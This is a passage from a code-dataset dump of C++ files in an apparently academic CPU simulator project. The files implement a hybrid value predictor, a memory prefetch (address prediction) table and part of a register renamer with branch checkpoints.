\t\ttag = value1+value2+value3+value4;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \telse if (order == 3) {\n// \t\tvalue1 = value1 ^ PC;\n// \t\tvalue2 = value2 ^ PC;\n// \t\tvalue3 = value3 ^ PC;\n// \t\tvalue1 = value1 << 20;\n// \t\tvalue2 = value2 << 10;\n// \t\ttag = value1+value2+value3+value4;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \telse if (order == 2) {\n// \t\tPC = PC << 25;\n// \t\tvalue1 = value1 & 1023;\n// \t\tvalue2 = value2 & 1023;\n// \t\tvalue1 = value1 << 10;\n// \t\ttag = PC+value1+value2;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \telse if (order == 1){\n// \t\tvalue1 = value1 & 32767;\n// \t\tPC = PC & 32767;\n// \t\tPC = PC << 15;\n// \t\ttag = PC + value1;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t\t//tag = value1;\n// \t}\n// \tenqueue(tag);\n// \tHASH = tag;\n// \treturn tag;\n// }\n\nuint64_t predictor::hash(uint64_t PC, uint64_t value1, uint64_t value2, uint64_t value3, uint64_t value4)\n{\n\tuint64_t tag,tag1,x1,x2,x3;\n\tif (order == 4) {\n\t\tPC = PC >>2;\n\t\t// value3 = value3 ^ PC;\n\t\t// //value3 = value3 << 8;\n\t\t// value2 = value2 ^ PC;\n\t\t// //value2 = value2 << 16;\n\t\t// value1 = value1 ^ PC;\n\t\t// //value1 = value1 << 24;\n\t\t// value4 = value4 ^ PC;\n\n\t\ttag = value1+value2+value3+value4;\n\t\ttag1 = pow(2,25);\n\t\ttag1 = tag1 - 1;\n\t\ttag = tag & tag1;\n\t}\n\telse if (order == 3) {\n\t\t// value1 = value1 ^ PC;\n\t\t// value2 = value2 ^ PC;\n\t\t// value3 = value3 ^ PC;\n\t\t// value1 = value1 << 20;\n\t\t// value2 = value2 << 10;\n\t\t// tag = value1+value2+value3+value4;\n\t\tPC = PC >>2;\n\t\ttag = value1+value2+value3;\n\t\ttag1 = pow(2,25);\n\t\ttag1 = tag1 - 1;\n\t\ttag = tag & tag1;\n\t}\n\telse if (order == 2) {\n\t\t// PC = PC << 20;\n\t\t// value1 = value1 & 1023;\n\t\t// value2 = value2 & 1023;\n\t\t// value1 = value1 << 10;\n\t\tPC = PC >> 2;\n\t\ttag = value1+value2;\n\t\ttag1 = pow(2,25);\n\t\ttag1 = tag1 - 1;\n\t\ttag = tag & tag1;\n\t}\n\telse if (order == 1){\n\t\t// value1 = value1 & 32767;\n\t\t// PC = PC & 32767;\n\t\t// PC = PC << 15;\n\t\tPC = PC >>2;\n\t\ttag = PC+value1;\n\t\ttag1 = pow(2,25);\n\t\ttag1 = tag1 - 1;\n\t\ttag = tag & tag1;\n\t}\n\tenqueue(tag);\n\tHASH = tag;\n\treturn tag;\n}\n\nvoid predictor::enqueue(uint64_t tag)\n{\n\tupdate_queue[uq_tail] = tag;\n\tif(uq_tail == (al_size-1))\n\t{\n\t\tuq_tail = 0;\n\t}\n\telse\n\t{\n\t\tuq_tail++;\n\t}\n}\n\nvoid predictor::update_predict(uint64_t value, uint64_t PC, uint64_t index)\n{\n\tuint64_t delta;\n\tuint64_t tag = PC>>2;\n\ttag = tag & 32767;\n\n\tdelta = value - predict[tag].last_val;\n\n\tif (counter == 1)\n\t{\n\n\n\tif (delta == predict[tag].del)\n\t{\n\t\tif (predict[tag].conf < 31)\n\t\t{\n\t\t\tpredict[tag].conf++;\n\t\t}\n\t}\n\telse\n\t{\n\t\tif (predict[tag].conf > 0)\n\t\t{\n\t\t\tpredict[tag].conf = 0;\n\t\t}\n\t}\n\n\tpredict[tag].del = delta;\n\tpredict[tag].last_val = value;\n\n\t}\n\n\tif (counter == 2)\n\t{\n\t\tif (value == predict[tag].last_val)\n\t\t{\n\t\t\tif (predict[tag].conf < 31)\n\t\t\t{\n\t\t\tpredict[tag].conf++;\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif (predict[tag].conf > 0)\n\t\t\t{\n\t\t\tpredict[tag].conf = 0;\n\t\t\t}\n\t\t}\n\t\tpredict[tag].last_val = value;\n\t}\n\tif (counter == 3 && !hybrid)\n\t{\n\t\ttag = index;\n\n\t\tif(value == vpt[tag].value)\n\t\t{\n\t\t\tif(vpt[tag].conf < 31)\n\t\t\t{\n\t\t\t\tvpt[tag].conf++;\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif(vpt[tag].conf >0)\n\t\t\t{\n\t\t\t\tvpt[tag].conf=0;\n\t\t\t\t// vpt[tag].value = value;\n\t\t\t}\n\t\t\tvpt[tag].value = value;\n\t\t}\n\n\t\tif(uq_head == (al_size-1))\n\t\t{\n\t\t\tuq_head = 0;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tuq_head++;\n\t\t}\n\n\t\ttag = PC>>2;\n\t\ttag = tag & 32767;\n\t\tif (order == 4) {\n\t\t\tpredict[tag].last_val = predict[tag].last_val2;\n\t\t\tpredict[tag].last_val2 = predict[tag].last_val3;\n\t\t\tpredict[tag].last_val3 = predict[tag].last_val4;\n\t\t\tpredict[tag].last_val4 = value;\n\t\t}\n\t\telse if (order == 3) {\n\t\t\tpredict[tag].last_val = predict[tag].last_val2;\n\t\t\tpredict[tag].last_val2 = predict[tag].last_val3;\n\t\t\tpredict[tag].last_val3 = value;\n\t\t}\n\t\telse if(order == 2){\n\t\t\tpredict[tag].last_val = predict[tag].last_val2;\n\t\t\tpredict[tag].last_val2 = value;\n\t\t}\n\t\telse if(order == 1){\n\t\t\tpredict[tag].last_val = value;\n\t\t}\n\t}\n\tif (hybrid) {\n\t\t//bool choose;\n\t\t// if (chooser[tag] >= 2) {\n\t\t// \tchoose = 1;\n\t\t// }\n\t\t// else{\n\t\t// \tchoose = 0;\n\t\t// }\n\t\tif (value == vpt[index].value) {\n\t\t\tif (chooser[tag] < 3) {\n\t\t\t\tchooser[tag]++;\n\t\t\t}\n\t\t}\n\t\telse if (value == hystride[tag].last_val) {\n\t\t\tif (chooser[tag] > 0) {\n\t\t\t\tchooser[tag]--;\n\t\t\t}\n\t\t}\n\t\t if (choose) {\n\t\t\ttag = index;\n\t\t\tif(value == vpt[tag].value)\n\t\t\t{\n\t\t\t\tif(vpt[tag].conf < 31)\n\t\t\t\t{\n\t\t\t\t\tvpt[tag].conf++;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tif(vpt[tag].conf >0)\n\t\t\t\t{\n\t\t\t\t\tvpt[tag].conf=0;\n\t\t\t\t\t// vpt[tag].value = value;\n\t\t\t\t}\n\t\t\t\tvpt[tag].value = value;\n\t\t\t}\n\n\t\t\tif(uq_head == (al_size-1))\n\t\t\t{\n\t\t\t\tuq_head = 0;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tuq_head++;\n\t\t\t}\n\n\t\t\ttag = PC>>2;\n\t\t\ttag = tag & 32767;\n\t\t\tif (order == 4) {\n\t\t\t\tpredict[tag].last_val = predict[tag].last_val2;\n\t\t\t\tpredict[tag].last_val2 = predict[tag].last_val3;\n\t\t\t\tpredict[tag].last_val3 = predict[tag].last_val4;\n\t\t\t\tpredict[tag].last_val4 = value;\n\t\t\t}\n\t\t\telse if (order == 3) {\n\t\t\t\tpredict[tag].last_val = predict[tag].last_val2;\n\t\t\t\tpredict[tag].last_val2 = predict[tag].last_val3;\n\t\t\t\tpredict[tag].last_val3 = value;\n\t\t\t}\n\t\t\telse if(order == 2){\n\t\t\t\tpredict[tag].last_val = predict[tag].last_val2;\n\t\t\t\tpredict[tag].last_val2 = value;\n\t\t\t}\n\t\t\telse if(order == 1){\n\t\t\t\tpredict[tag].last_val = value;\n\t\t\t}\n\t\t }\n\t\t else\n\t\t{\n\t\t\tdelta = value - hystride[tag].last_val;\n\t\t\tif (delta == hystride[tag].del)\n\t\t\t{\n\t\t\t\tif (hystride[tag].conf < 31)\n\t\t\t\t{\n\t\t\t\t\thystride[tag].conf++;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tif (hystride[tag].conf > 0)\n\t\t\t\t{\n\t\t\t\t\thystride[tag].conf = 0;\n\t\t\t\t}\n\t\t\t}\n\t\t\thystride[tag].del = delta;\n\t\t\thystride[tag].last_val = value;\n\t\t}\n\t}\n}\n\n\nvoid predictor::dec_iter(uint64_t PC)\n{\n\tuint64_t tag = PC>>2;\n\ttag = tag & 32767;\n\tif (predict[tag].iter_count > 0)\n\t{\n\t\tpredict[tag].iter_count--;\n\t}\n}\n\nvoid predictor::checkpoint_context(uint64_t tail)\n{\n uq_tail = tail;\n}\n\nvoid predictor::inc_iter(uint64_t PC)\n{\n\tuint64_t tag = PC>>2;\n\ttag = tag & 32767;\n\tpredict[tag].iter_count++;\n}\n\nvoid predictor::clear_predictor()\n{\n\n\tuint64_t count = pow(2,15);\n\tfor (uint64_t i = 0; i < count; i++)\n\t{\n\t\tpredict[i].iter_count = 0;\n\t}\n\n\tuq_head = 0;\n\tuq_tail = 0;\n}\n\nbool predictor::get_conf(uint64_t PC)\n{\n\tuint64_t tag = PC>>2;\n\ttag = tag & 32767;\n\tif(predict[tag].conf == 31)\n\t{\n\t\treturn true;\n\t}\n\telse\n\t{\n\t\treturn false;\n\t}\n}\n\nbool predictor::get_context_conf(uint64_t LV1, uint64_t LV2,uint64_t LV3, uint64_t LV4, uint64_t found, uint64_t PC)\n{\n\tuint64_t value, tag;\n\tuint64_t tag1;\n\ttag1 = PC >> 2;\n\ttag1 = tag1 & 32767;\n\tcounter = 3;\n\tif (order == 4) {\n\t\tif(found >= 4)\n\t\t{\n\t\t\ttag = hash(PC,LV4, LV3, LV2, LV1);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 3)\n\t\t{\n\t\t\ttag = hash(PC, predict[tag1].last_val4,LV3,LV2, LV1);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 2)\n\t\t{\n\t\t\ttag = hash(PC, predict[tag1].last_val3, predict[tag1].last_val4,LV2,LV1);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 1)\n\t\t{\n\t\t\ttag = hash(PC, predict[tag1].last_val2, predict[tag1].last_val3,predict[tag1].last_val4,LV1);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 0)\n\t\t{\n\t\t\ttag = hash(PC,predict[tag1].last_val, predict[tag1].last_val2, predict[tag1].last_val3, predict[tag1].last_val4);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t}\n\telse if (order == 3) {\n\t\tif (found == 3) {\n\t\t\ttag = hash(PC, LV3, LV2, LV1, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 2) {\n\t\t\ttag = hash(PC, predict[tag1].last_val3, LV2, LV1, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 1) {\n\t\t\ttag = hash(PC, predict[tag1].last_val2, predict[tag1].last_val3, LV1, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 0) {\n\t\t\ttag = hash(PC, predict[tag1].last_val, predict[tag1].last_val2, predict[tag1].last_val, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t}\n\telse if (order == 2) {\n\t\tif (found == 2) {\n\t\t\ttag = hash(PC, LV2, LV1, 0, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 1) {\n\t\t\ttag = hash(PC, predict[tag1].last_val2, LV1, 0, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 0) {\n\t\t\ttag = hash(PC, predict[tag1].last_val, predict[tag1].last_val2, 0, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t}\n\telse if (order == 1) {\n\t\tif (found == 1) {\n\t\t\ttag = hash(PC, LV1, 0, 0, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 0) {\n\t\t\ttag = hash(PC, predict[tag1].last_val, 0, 0, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t}\n\tif (value == 31) {\n\t\treturn 1;\n\t}\n\telse{\n\t\treturn 0;\n\t}\n}\n\nbool predictor::get_hybrid_conf(uint64_t LV1, uint64_t LV2,uint64_t LV3,uint64_t LV4, uint64_t found, uint64_t PC)\n{\n\tuint64_t value, tag, conf;\n\tuint64_t tag1;\n\ttag1 = PC >> 2;\n\ttag1 = tag1 & 32767;\n\n\thybrid = 1;\n\tif (chooser[tag] >= 2) {\n\t\tchoose = 1;\n\t}\n\telse{\n\t\tchoose = 0;\n\t}\n\tif (choose) {\n\t\tconf = get_context_conf(LV1, LV2, LV3, LV4, found, PC);\n\t\treturn conf;\n\t}\n\telse{\n\t\tif(hystride[tag].conf == 31)\n\t\t{\n\t\t\treturn true;\n\t\t}\n\t\telse\n\t\t{\n\t\t\treturn false;\n\t\t}\n\t}\n\n}\n\npredictor::~predictor()\n{\n\n}\n" }, { "alpha_fraction": 0.5883849859237671, "alphanum_fraction": 0.6015733480453491, "avg_line_length": 17.825687408447266, "blob_id": "d95a5ba051c87b5bad584ccd5832b3fe850fdd68", "content_id": "e78df5e95cd15eef5a4d5b52f76a16a1ff9b26c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4322, "license_type": "no_license", "max_line_length": 113, "num_lines": 218, "path": "/721sim-partial/uarchsim/mpt.cc", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "#include \"pipeline.h\"\r\n\r\n// constructor\r\nmpt::mpt(unsigned int size) {\r\n\r\n\t// Initialize the Memory Prefetch Table\r\n\tmp_table = new mpt_table[size];\r\n\tthis->size = size;\r\n\r\n}\r\n\r\nbool mpt::read_entry(unsigned int pc) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\tmp_table[mpt_index].pred_count++;\r\n\tif (mp_table[mpt_index].valid) {\r\n\t\t//PAY.buf[index].mpt_hit = true;\r\n\t\treturn true;\r\n\t}\r\n\telse {\r\n\t\t//PAY.buf[index].mpt_hit = false;\r\n\t\treturn false;\r\n\t}\r\n}\r\n\r\nvoid mpt::create_entry(reg_t current_addr, unsigned int pc) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\tmp_table[mpt_index].valid = 1;\r\n\tmp_table[mpt_index].effective_address = current_addr;\r\n\tmp_table[mpt_index].stride = 0;\r\n\tmp_table[mpt_index].shb = 0;\r\n\tmp_table[mpt_index].next_predicted_address = 0;\r\n\r\n\tif (mp_table[mpt_index].pred_count == 0)\r\n\t\tmp_table[mpt_index].pred_count = 0;\r\n\telse\r\n\t\tmp_table[mpt_index].pred_count--;\r\n\r\n}\r\n\r\n\r\nbool mpt::is_addr_predictable(unsigned int pc) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\r\n\r\n\t//if (mp_table[mpt_index].shb >= 15 && mp_table[mpt_index].dispatch_conf >=2) {\r\n\tif (mp_table[mpt_index].shb >= 15) {\r\n\r\n\r\n\t\t//printf(\"Number of Predicted Instructions : %d \\n\", predictionCount);\r\n\t\treturn true;\r\n\r\n\r\n\t}\r\n\telse {\r\n\t\treturn false;\r\n\t}\r\n\r\n\r\n}\r\n\r\nunsigned int mpt::predict_address(unsigned int pc) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\r\n\t\treturn mp_table[mpt_index].effective_address + ((mp_table[mpt_index].pred_count) * mp_table[mpt_index].stride);\r\n\r\n\r\n}\r\n\r\n\r\nunsigned int mpt::predict_next_addr(unsigned int pc) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\tif (mp_table[mpt_index].shb >= 2) {\r\n\r\n\t\t\treturn mp_table[mpt_index].effective_address + (2 * mp_table[mpt_index].stride);\r\n\r\n\t}\r\n\r\n}\r\n\r\n\r\nvoid mpt::update_entry(reg_t current_addr, unsigned int pc, int inst_issue_delay) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\t// Updating Pred Count\r\n\tif (mp_table[mpt_index].pred_count == 0)\r\n\t\tmp_table[mpt_index].pred_count = 0;\r\n\telse\r\n\t\tmp_table[mpt_index].pred_count--;\r\n\r\n\r\n\r\n\t//if (current_addr >= mp_table[mpt_index].effective_address) {\r\n\t// Updating SHB\r\n\tif (current_addr - mp_table[mpt_index].effective_address == mp_table[mpt_index].stride) {\r\n\t\tif (mp_table[mpt_index].shb == 15)\r\n\t\t\tmp_table[mpt_index].shb = 15;\r\n\t\telse\r\n\t\t\tmp_table[mpt_index].shb++;\r\n\t}\r\n\telse {\r\n\t\tif (mp_table[mpt_index].shb == 0)\r\n\t\t\tmp_table[mpt_index].shb = 0;\r\n\t\telse\r\n\t\t\tmp_table[mpt_index].shb = 0;\r\n\t}\r\n\r\n\r\n\t// Updating Stride\r\n\tmp_table[mpt_index].stride = current_addr - mp_table[mpt_index].effective_address;\r\n\r\n\r\n\t// Updaing Effective Address\r\n\tmp_table[mpt_index].effective_address = current_addr;\r\n\r\n\t// Updaing Dispatch Confidence\r\n\r\n\tif(inst_issue_delay < 3)\r\n\t{\r\n\t\tmp_table[mpt_index].dispatch_conf = 0;\r\n\t}\r\n\r\n\telse\r\n\t{\r\n\tif (mp_table[mpt_index].dispatch_conf == 2)\r\n\t\t\tmp_table[mpt_index].dispatch_conf = 2;\r\n\t\telse\r\n\t\t\tmp_table[mpt_index].dispatch_conf++;\r\n\t}\r\n\r\n\t//}\r\n\t/*else {\r\n\r\n\t\tif (mp_table[mpt_index].effective_address - current_addr == mp_table[mpt_index].stride) {\r\n\t\t\tif (mp_table[mpt_index].shb == 100)\r\n\t\t\t\tmp_table[mpt_index].shb = 100;\r\n\t\t\telse\r\n\t\t\t\tmp_table[mpt_index].shb++;\r\n\t\t}\r\n\t\telse {\r\n\t\t\tif (mp_table[mpt_index].shb == 0)\r\n\t\t\t\tmp_table[mpt_index].shb = 0;\r\n\t\t\telse\r\n\t\t\t\tmp_table[mpt_index].shb = 0;\r\n\t\t}\r\n\t\t//printf(\"SHB = %d \\n\",mp_table[mpt_index].shb);\r\n\r\n\r\n\t\t\tmp_table[mpt_index].stride = mp_table[mpt_index].effective_address - current_addr;\r\n\r\n\r\n\t}*/\r\n\r\n\r\n\r\n\r\n\r\n\r\n}\r\n\r\n\r\nvoid mpt::set_confidence_low(unsigned int pc) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\tmp_table[mpt_index].shb = 0;\r\n\r\n}\r\n\r\n\r\nvoid mpt::squash_pred_count() {\r\n\r\n\tfor (int i = 0; i <= size - 1; i++) {\r\n\r\n\t\tmp_table[i].pred_count = 0;\r\n\t}\r\n\r\n\r\n\r\n\r\n\r\n}\r\n\r\nvoid mpt::dec_pred_count(unsigned int pc) {\r\n\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\t\tmp_table[mpt_index].pred_count--;\r\n\r\n}\r\n\r\nvoid mpt::inc_pred_count(unsigned int pc) {\r\n\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\t\tmp_table[mpt_index].pred_count++;\r\n\r\n}\r\n" }, { "alpha_fraction": 0.5148192048072815, "alphanum_fraction": 0.526340901851654, "avg_line_length": 31.20052719116211, "blob_id": "b3a14e9492c9fe1b8ae74e51de32a50149461dc2", "content_id": "f72a92cc90f1c6dd4eef09c44c03ffbe4b5fe5b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 25172, "license_type": "no_license", "max_line_length": 96, "num_lines": 758, "path": "/721sim-partial/uarchsim/renamer.cc", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "#include <iostream>\r\n#include \"renamer.h\"\r\n#include <assert.h>\r\n#include <bitset>\r\n\r\n\r\n////////////////////////////////////////\r\n// Public functions.\r\n////////////////////////////////////////\r\n\r\n/////////////////////////////////////////////////////////////////////\r\n// This is the constructor function.\r\n// When a renamer object is instantiated, the caller indicates:\r\n// 1. The number of logical registers (e.g., 32).\r\n// 2. The number of physical registers (e.g., 128).\r\n// 3. The maximum number of unresolved branches.\r\n// Requirement: 1 <= n_branches <= 64.\r\n//\r\n// Tips:\r\n//\r\n// Assert the number of physical registers > number logical registers.\r\n// Assert 1 <= n_branches <= 64.\r\n// Then, allocate space for the primary data structures.\r\n// Then, initialize the data structures based on the knowledge\r\n// that the pipeline is intially empty (no in-flight instructions yet).\r\n/////////////////////////////////////////////////////////////////////\r\n using namespace std;\r\n\t\r\n renamer::renamer(uint64_t n_log_regs, uint64_t n_phys_regs, uint64_t n_branches)\r\n\t{\r\n std::cout << \"Start ----------------------------------------------------\" << std::endl;\r\n cout << \"Number of Physical Registers : \" << n_phys_regs << endl;\r\n cout << \"Number of logical Registers : \" << n_log_regs << endl;\r\n cout << \"Number of Branch Checkpoints : \" << n_branches<< endl;\r\n\t\tassert((n_phys_regs > n_log_regs) && (n_branches >= 1) && (n_branches <= 64));\r\n\t\t\trmt = new uint64_t[n_log_regs];\r\n\t\t\tamt = new uint64_t[n_log_regs];\r\n\t\t\tfl = new freeList[n_phys_regs - n_log_regs];\r\n\t\t\tflHead = 0;\r\n\t\t\tflTail = 0;\r\n\t\t\tactList = new activeList[n_phys_regs - n_log_regs];\r\n\t\t\talHead = 0;\r\n\t\t\talTail = 0;\r\n\t\t\tphyList = new uint64_t[n_phys_regs];\r\n\t\t\t\r\n\t\t\t// Initializing Branch Checkpoint\r\n\t\t\tbCheckPoint = new branchCheckpoint[n_branches];\r\n\t\t\tfor (int i = 0; i <= n_branches - 1; i++) {\r\n\t\t\t\tbCheckPoint[i].shadowMapTable = new uint64_t[n_log_regs];\r\n\t\t\t\tbCheckPoint[i].GBM = 0;\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\tphyRegisterReady = new uint64_t[n_phys_regs];\r\n\r\n\t\t\tfor (int i = 0; i <= n_log_regs-1; i++) {\r\n\t\t\t\trmt[i] = i;\r\n\t\t\t}\r\n\r\n\t\t\tfor (int i = 0; i <= n_log_regs-1; i++) {\r\n\t\t\t\tamt[i] = i;\r\n\t\t\t}\r\n\r\n\t\t\tfor (int i = 0; i <= n_phys_regs-1; i++) {\r\n\t\t\t\tphyList[i] = 0;\r\n\t\t\t}\r\n\r\n\t\t\tfor (int i = 0; i <= (n_phys_regs - n_log_regs - 1); i++) {\r\n\t\t\t\tfl[i].physicalReg = i+n_log_regs;\r\n\t\t\t\tfl[i].valid = 1;\r\n\t\t\t}\r\n\r\n\t\t\tfor (int i = 0; i <= (n_phys_regs - n_log_regs - 1); i++) {\r\n\t\t\t\tactList[i].valid = 0;\r\n //actList[i].ready = 0;\r\n\t\t\t}\r\n\r\n\t\t\tfor (int i = 0; i <= (n_phys_regs - 1); i++) { ////////----------------------\r\n\t\t\t\tphyRegisterReady[i] = 1;\r\n\t\t\t}\r\n\r\n\t\t\tGBM = 0;\r\n \r\n phyRegSize = n_phys_regs;\r\n\t\t\tlogRegSize = n_log_regs;\r\n\t\t\tnumOfBranch = n_branches;\r\n \r\n \r\n\r\n\t}\r\n\r\n\r\n\r\n\t//////////////////////////////////////////\r\n\t\t// Functions related to Rename Stage. //\r\n\t\t//////////////////////////////////////////\r\n\r\n\t\t/////////////////////////////////////////////////////////////////////\r\n\t\t// The Rename Stage must stall if there aren't enough free physical\r\n\t\t// registers available for renaming all logical destination registers\r\n\t\t// in the current rename bundle.\r\n\t\t//\r\n\t\t// Inputs:\r\n\t\t// 1. bundle_dst: number of logical destination registers in\r\n\t\t// current rename bundle\r\n\t\t//\r\n\t\t// Return value:there\r\n\t\t// Return \"true\" (stall) if there aren't enough free physical\r\n\t\t// registers to allocate to all of the logical destination registers\r\n\t\t// in the current rename bundle.\r\n\t\t/////////////////////////////////////////////////////////////////////\r\n\t// To find the number of free registers\r\n\t/*uint64_t renamer::numOfFreeRegister() {\r\n\t\tuint64_t freeRegCount = 0;\r\n\t\tfor (int i = 0; i <= (phyRegSize - logRegSize - 1); i++) {\r\n\t\t\tif (fl[i].valid == 1) {\r\n\t\t\t\tfreeRegCount++;\r\n\t\t\t}\r\n\t\t}\r\n\t\treturn freeRegCount;\r\n\t}\r\n*/\r\n\tbool renamer::stall_reg(uint64_t bundle_dst) {\r\n uint64_t freeRegCount = 0;\r\n\t\tfor (int i = 0; i <= (phyRegSize - logRegSize - 1); i++) {\r\n\t\t\tif (fl[i].valid == 1) {\r\n\t\t\t\tfreeRegCount++;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (freeRegCount < bundle_dst) {\r\n\t\t\t//printf(\"Rename Stalled \\n\");\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\telse {\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\t\r\n\t}\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// The Rename Stage must stall if there aren't enough free\r\n\t// checkpoints for all branches in the current rename bundle.\r\n\t//\r\n\t// Inputs:\r\n\t// 1. bundle_branch: number of branches in current rename bundle\r\n\t//\r\n\t// Return value:\r\n\t// Return \"true\" (stall) if there aren't enough free checkpoints\r\n\t// for all branches in the current rename bundle.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t//To find the number of empty branch checkpoints\r\n\r\n\t\r\n\tbool renamer::stall_branch(uint64_t bundle_branch) {\r\n \t\tstd::bitset <64> gbmBinary(GBM);\r\n uint64_t freeBranchCount = 0;\r\n\t\tfor (int i = 0; i <= numOfBranch - 1; i++) {\r\n\t\t\tif (gbmBinary[i] == 0) {\r\n\t\t\t\tfreeBranchCount++;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (freeBranchCount < bundle_branch) {\r\n\t\t\t//printf(\"Rename Stalled Branch \\n\");\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\telse {\r\n\t\t\treturn false;\r\n\t\t}\r\n\t}\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function is used to get the branch mask for an instruction.\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tuint64_t renamer::get_branch_mask() {\r\n\t\treturn GBM;\r\n\t}\r\n\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function is used to rename a single source re/gister.\r\n\t//\r\n\t// Inputs:\r\n\t// 1. log_reg: the logical register to rename\r\n\t//\r\n\t// Return value: physical register name\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tuint64_t renamer::rename_rsrc(uint64_t log_reg) {\r\n\t\treturn rmt[log_reg];\r\n\t}\r\n\r\n\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function is used to rename a single destination register.\r\n\t//\r\n\t// Inputs:\r\n\t// 1. log_reg: the logical register to rename\r\n\t//\r\n\t// Return value: physical register name\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tuint64_t renamer::rename_rdst(uint64_t log_reg) {\r\n assert(!stall_reg(1));\r\n \t\tuint64_t phyReg;\r\n phyReg = fl[flHead].physicalReg;\r\n \t\tfl[flHead].valid = 0;\r\n \t\trmt[log_reg] = phyReg;\r\n \t\tphyRegisterReady[phyReg] = 0;\r\n \t\tif (flHead == (phyRegSize - logRegSize - 1))\r\n \t\t{\r\n \t\t\tflHead = 0;\r\n \t\t}\r\n \t\telse {\r\n \t\t\tflHead++;\r\n \t\t}\r\n return phyReg;\r\n\t}\r\n\t/////////////////////////////////////////////////////////////////////\r\n\t// This function creates a new branch checkpoint.\r\n\t//\r\n\t// Inputs: none.\r\n\t//\r\n\t// Output:\r\n\t// 1. The function returns the branch's ID. When the branch resolves,\r\n\t// its ID is passed back to the renamer via \"resolve()\" below.\r\n\t//\r\n\t// Tips:\r\n\t//\r\n\t// Allocating resources for the branch (a GBM bit and a checkpoint):\r\n\t// * Find a free bit -- i.e., a '0' bit -- in the GBM. Assert that\r\n\t// a free bit exists: it is the user's responsibility to avoid\r\n\t// a structural hazard by calling stall_branch() in advance.\r\n\t// * Set the bit to '1' since it is now in use by the new branch.\r\n\t// * The position of this bit in the GBM is the branch's ID.\r\n\t// * Use the branch checkpoint that corresponds to this bit.\r\n\t// \r\n\t// The branch checkpoint should contain the following:\r\n\t// 1. Shadow Map Table (checkpointed Rename Map Table)\r\n\t// 2. checkpointed Free List head index\r\n\t// 3. checkpointed GBM\r\n\t/////////////////////////////////////////////////////////////////////\r\n\tuint64_t renamer::checkpoint() {\r\n \tassert(!stall_branch(1));\r\n\t\tstd::bitset\t<64> gbmBinary(GBM);\r\n\t\tuint64_t branchId; // TO BE CHECKED\r\n\t\tfor (int i = 0; i <= numOfBranch - 1; i++) {\r\n\t\t\tif (gbmBinary[i] == 0) {\r\n\t\t\t\tbranchId = i;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\tgbmBinary[branchId] = 1;\r\n\t\tGBM = 